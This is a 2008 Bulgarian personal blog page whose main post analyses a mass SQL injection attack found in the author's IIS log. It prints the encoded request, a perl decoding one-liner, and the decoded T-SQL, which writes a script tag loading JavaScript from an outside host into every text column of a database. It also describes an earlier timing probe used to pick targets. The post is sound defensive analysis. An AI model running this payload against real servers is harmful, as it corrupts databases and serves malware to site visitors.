Inner Party System
30. September 2008, 12:56 
коментари(0)
коментари(0)
Eclective Method “Dont Stop” Mash Up
Архив за September, 2008
Gordon Freeman Is Back
10. September 2008, 10:22 коментари(3)
коментари(3)
Днес ще пуснат Големия адронов ускорител @ CERN.
И още нещо – Gordon Freeman е забелзан около ускорителя.
USA напаР
4. September 2008, 15:26 коментари(0)
коментари(0)
Това вече минава границата на пародията.
Наглост до дупка. И овчедушие също.
ПослеР
2. September 2008, 14:58 коментари(4)
коментари(4)
Прекъсвам малко отпуската на блога, за да споделя опита с последната мода в SQL Injection атаките.
(конкретния пример е за MSSQL Server 2005 и IIS уеб-сървър)
В IIS лога би трябвало да имам нещо такова :
2008-08-28 00:00:41 GET /URL.aspx?<вашите -си-параметри>;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0×44454..<махнато>..%20AS%20CHAR(4000));EXEC(@S); – 61.152.106.142 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;+InfoPath.1) – 302 392
След като прочетете шестнайсетичниа код ето така :
echo “<тук-вкарайте-всичко след 0x...>” | perl -pe ’s/(..)/chr(hex($1))/ge’
излиза това :
DECLARE @T varchar(255),@C varchar(4000)
DECLARE Table_Cursor CURSOR FOR
select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype=’u’ and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)
BEGIN
exec(’update ['+@T+'] set ['+@C+']=””></title><script src=”http://www0.douhunqn.cn/csrss/w.js”></script><!–”+['+@C+'] where ‘+@C+’ not like ”%”></title><script src=”http://www0.douhunqn.cn/csrss/w.js”></script><!–”’)
FETCH NEXT FROM Table_Cursor INTO @T,@C
ENDCLOSE Table_Cursor
DEALLOCATE Table_Cursor
(разкрасил съм го малко, за да стане по-четлив)
Интересна е хронологията на на атаката, защото преди известно време (в моя случай около май) е имало още един подобен request, който е целял единствено да провери дали сървъра ще отговори за определено време – 20 секудни. Така се набелязват сървърите, които след това се атакуват.
Дали са станали страхливи хакерите или прост ни дават един още един шанс за защита…
About
Blog of Sergey Petrov.
Day-job - web-developer, durring the long nights - hobbyist game developer. Interests in Artifical Inteligence, Multi-Agent Systems, HUGE Nintendo fan, Fable, Fable 2, and so on, and so on...»
Add me to...
Месечен архив
- November 2009
- April 2009
- March 2009
- February 2009
- January 2009
- December 2008
- November 2008
- October 2008
- September 2008
- August 2008
- July 2008
- June 2008
- May 2008
- April 2008
- March 2008
- February 2008
- January 2008
- December 2007
- November 2007
- September 2007
- August 2007
- July 2007
- June 2007
- May 2007
- April 2007
- March 2007
- February 2007
- January 2007
- December 2006
- November 2006
- October 2006
- September 2006
- August 2006
- July 2006
- February 2005
- January 2005
- December 2004
- November 2004
- October 2004
- September 2004
- August 2004
- July 2004
- June 2004
- May 2004
- April 2004
- March 2004
- February 2004
- January 2004
- December 2003
- November 2003
- October 2003
- September 2003
- July 2003
- June 2003
- May 2003
- April 2003
- January 2003
- December 2002
- November 2002
- October 2002
Последни коментари
- 06.09.10, 04:04: Р?пражненР(Trackback Diltiazem cr.)
- 06.09.10, 00:54: Почуствай Р?СѓР·Р (Trackback Ambien.)
- 31.03.10, 13:58: Veoh blocked! (от Ядосана Потреби…)
- 25.01.10, 12:43: На 30! (от Дени)
- 26.11.09, 16:05: На 30! (от mar)
- 24.11.09, 12:09: На 30! (от Harca)
- 23.11.09, 18:55: На 30! (от petya)
- 23.11.09, 16:35: На 30! (от х)
- 23.11.09, 16:07: На 30! (от Елена)
- 11.08.09, 19:26: Fez (от Димо)
- 28.06.09, 15:42: Veoh blocked! (от Tedi-chan)
- 08.05.09, 16:59: Jon Stewart - The Daily Show (от eva)
- 28.04.09, 18:51: Fez (от ping)
- 26.04.09, 01:08: chatango (от nameless)
- 03.04.09, 16:27: Fk* (Pingback Nobody’s Life » Fe…)
Friendly Sites
WP powered Site | Theme: Freedom Blue by Frank Helmschrott at Design Parts. Kudos to Michael for the inspiration and the colors, Fredrik for the original Design.
Since October 2002